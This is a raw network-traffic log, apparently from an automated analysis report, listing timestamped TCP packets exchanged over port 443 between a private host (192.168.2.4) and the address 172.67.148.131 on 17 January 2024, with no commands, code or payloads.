                                                                                                                                                              Jan 17, 2024 17:39:32.474122047 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.474138975 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.474150896 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.474319935 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.474366903 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.474379063 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.474428892 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.474440098 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.475096941 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.475162029 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.475174904 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.520172119 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.558795929 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.558902025 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.558964014 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.559041023 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.559743881 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.559823036 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.559974909 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.560031891 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.560317039 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.560380936 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.560707092 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.560765982 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.560858965 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.560914993 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.561100006 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.561148882 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.561573029 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.561626911 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.561703920 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.561757088 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.562493086 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.562546968 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.562721968 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.562772989 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.563668013 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.563724041 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.563803911 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.563848972 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.563854933 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.563900948 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.563921928 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.564088106 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.564107895 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.564121962 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.570760965 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.572421074 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.572472095 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.572587013 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.573060036 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.573096037 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.573162079 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.573785067 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.573824883 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.573904991 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.574095964 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.574126005 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.574172974 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.574518919 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.574533939 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.574578047 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.575511932 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.575525045 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.575962067 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.575984955 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.576271057 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.576286077 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.576617002 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.576630116 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.576771975 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.576786041 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.613903999 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.796972036 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.798249006 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.798275948 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.798687935 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.799248934 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.799313068 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.799532890 CET49804443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.811240911 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.811469078 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.811484098 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.812367916 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.812443972 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.812786102 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.812840939 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.813107967 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.813113928 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.840476036 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.840770960 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.840806961 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.842672110 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.842736959 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.843034983 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.843182087 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.843187094 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.843240023 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.845895052 CET44349804172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.850723982 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.850955963 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.850981951 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.851017952 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.851175070 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.851187944 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.851507902 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.851798058 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.851880074 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.851924896 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.851993084 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.852050066 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.852365971 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.852431059 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.852452040 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.860142946 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.891220093 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.891288996 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.893918991 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.893937111 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.906594992 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.906626940 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.906656027 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925123930 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925174952 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925194025 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925226927 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925240993 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925283909 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925379992 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925487995 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925575972 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925626040 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925635099 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925698996 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925745964 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925751925 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925793886 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.925798893 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.925966978 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926022053 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.926028013 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926100969 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926151037 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.926156998 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926676035 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926748037 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926794052 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.926800966 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926840067 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.926846027 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.926923990 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927170992 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.927171946 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927201986 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927331924 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.927340031 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927361012 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927414894 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.927447081 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927567959 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.927628994 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.927634954 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928109884 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928164005 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.928170919 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928287029 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928364992 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928416967 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.928423882 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928472042 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.928477049 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928917885 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.928973913 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.928982973 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929063082 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929137945 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929184914 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.929193020 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929233074 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.929238081 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929366112 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.929406881 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.929414034 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.930469036 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.930526018 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.930531979 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.937474012 CET49805443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.952572107 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.983578920 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.013104916 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.013123035 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.013178110 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.013194084 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.013241053 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.013386965 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.013438940 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.013745070 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.013796091 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.013969898 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.014025927 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.014770031 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.014830112 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.015034914 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.015091896 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.015233040 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.015285015 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.015544891 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.015600920 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.015913010 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.015969992 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.015978098 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.016026974 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.016151905 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.016159058 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.016174078 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.268197060 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.268332958 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.268506050 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.268765926 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.268891096 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.268932104 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.268968105 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.268981934 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.269045115 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.269714117 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.269908905 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.269959927 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.269965887 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270164013 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270211935 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270216942 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270371914 CET49803443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270376921 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270390987 CET44349803172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270479918 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270535946 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270545959 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270581007 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270801067 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270802975 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270843983 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270847082 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270858049 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.270896912 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.270915985 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.271416903 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.271470070 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.271476030 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.271605968 CET49807443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.271610975 CET44349807172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.272764921 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.272819996 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.272824049 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.275701046 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.275867939 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.275872946 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.276331902 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.276390076 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.276395082 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.277232885 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.277293921 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.277298927 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.277466059 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.277523041 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.277527094 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.278033972 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.278091908 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.278096914 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.278141975 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.278235912 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.278242111 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.279619932 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.279649973 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.279691935 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.279696941 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.279954910 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.279985905 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.280011892 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.280107021 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.280170918 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.280256987 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.280299902 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.280304909 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.280407906 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.280508995 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.280514002 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.281179905 CET49808443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.281189919 CET44349808172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.281912088 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.281974077 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.281980991 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.281985998 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282037020 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.282064915 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282346964 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282588005 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282636881 CET49806443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:33.282643080 CET44349806172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282859087 CET44349805172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.282934904 CET49805443192.168.2.4172.67.148.131
